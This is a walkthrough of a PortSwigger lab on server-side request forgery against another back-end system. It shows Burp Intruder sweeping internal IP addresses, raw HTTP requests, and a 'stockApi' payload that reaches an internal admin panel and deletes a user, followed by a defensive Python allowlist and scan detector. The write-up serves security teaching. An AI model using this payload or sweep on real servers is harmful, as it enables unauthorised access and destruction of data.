SSRF Attack With Another Back-End System

Hello Cyberman!
How are you? I hope you are fine.
This article covers an SSRF attack method: attacking another back-end system.
If you don’t know what SSRF is, read this post.
Now we continue with this attack method using a different example.
The method is called “another back-end system”. Here is how it works. Above all, we must not forget that SSRF is a server-side attack. In this scenario, the server gets its data from another server.
As seen in the picture above, in this scenario, when the client computer visits the website, the server computer (IP address: 192.168.0.155) shows the website to the client computer.
When the client computer requests other data, the computer with the IP address 192.168.0.155 requests that data from the other computer (IP address: 192.168.0.200).
These two computers are actually on the same network. When we want to delete data on the computer with the IP address 192.168.0.155, we need to find the data source, because the source of the data is the computer at 192.168.0.200.
An example of this scenario is available as a PortSwigger lab. Click the “Access the lab” button to enter the lab, as seen in the picture below.
Press the “View Details” button on any stock item on the screen that opens. When we click the “Check Stock” button to find out the amount of this stock in other branches, it gives us a number.
Now, think differently. If this server is receiving data from another server, can I retrieve or modify other data from that server? The answer is yes. We need a program to see the requests and responses. Its name is Burp Suite. I explained what Burp Suite is in an earlier article.
Now we open Burp Suite. Then, with Intercept on, click the “Check stock” button. The response from the server is as seen in the picture below.
And the “stockApi” parameter is in front of us. We change the IP address in the parameter: we set the “stockApi” parameter to “http://192.168.0.1:8080/admin”, as seen in the picture below.
An IP address takes numbers from 0 to 255. There are many numbers between 0 and 255, and it would not be right to try them one by one. We use a wonderful feature of Burp Suite: “Intruder”.
So, let’s send our request to “Intruder” in Burp Suite. To do this, right-click the request and click “Send to Intruder”.
As seen in the picture above, Burp Suite will automatically try the green areas for us. First, click the “Clear” button to unselect all areas. Then select just the “1” in the IP address and click the “Add $” button.
Then configure the payload settings as shown in the picture below.
Then click the “Start attack” button. The attack screen opens and tries the numbers for us one by one. We need status code 200 in the status column, as seen in the picture below, marked in yellow.
I had to reboot due to a Burp Suite connection problem. Therefore, I got the status code “200” at number “12”, as seen in the picture below.
OK, now let’s manipulate the request with Burp Suite. I add “http://192.168.0.12:8080/admin” to the “stockApi” parameter. Then I send the request by pressing the Forward button.
Then click the “delete” button to delete carlos, and look at the request in Burp Suite.
The result is the text below:
GET /http://192.168.0.12:8080/admin/delete?username=carlos HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
OK, now we take this GET request and edit it as in the text below:
POST /product/stock HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Content-Length: 96
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

stockApi=http://192.168.0.12:8080/admin/delete?username=carlos
Then we send the request via Burp Suite.
And finally! First we reached the admin panel, then deleted carlos…
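The lab works because the server fetches whatever URL arrives in “stockApi”. The following added example (not part of the original article or the lab's code) shows a server-side allowlist check for that parameter, plus a log check that flags sessions sending many refused targets, as the Intruder run above does. The host name stock.internal.example, the function names and the sample requests are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Assumption: the one back-end the stock checker may call (hypothetical name).
ALLOWED_BACKENDS = {("stock.internal.example", 8080)}

def check_stock_api(url):
    """Return None if the server may fetch this URL, else the refusal reason."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return "malformed URL"
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    if parts.username or parts.password:
        return "credentials in URL"
    host = (parts.hostname or "").lower()
    try:
        ipaddress.ip_address(host)
        return "IP literal, not an allowlisted host name"
    except ValueError:
        pass  # not an IP literal, fall through to the allowlist
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if (host, port) not in ALLOWED_BACKENDS:
        return "host/port not on the allowlist"
    return None

def sweep_sessions(requests, threshold=3):
    """Sessions that sent at least `threshold` distinct refused stockApi values."""
    refused = {}
    for session, body in requests:
        for url in parse_qs(body).get("stockApi", []):
            if check_stock_api(url) is not None:
                refused.setdefault(session, set()).add(url)
    return sorted(s for s, urls in refused.items() if len(urls) >= threshold)

# Constructed sample: (session id, form body of POST /product/stock).
SAMPLE = [("sess-A", f"stockApi=http://192.168.0.{n}:8080/admin") for n in (1, 2, 3, 12)]
SAMPLE.append(("sess-B", "stockApi=http%3A%2F%2Fstock.internal.example%3A8080"
               "%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2"))

if __name__ == "__main__":
    print(check_stock_api("http://192.168.0.12:8080/admin/delete?username=carlos"))
    print(sweep_sessions(SAMPLE))  # sessions that look like an address sweep
```

The check covers only the URL as submitted; the code that performs the fetch should also refuse to follow redirects, so that an allowlisted host cannot bounce the request to another address.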
Have a nice day with lots of informatics 🙂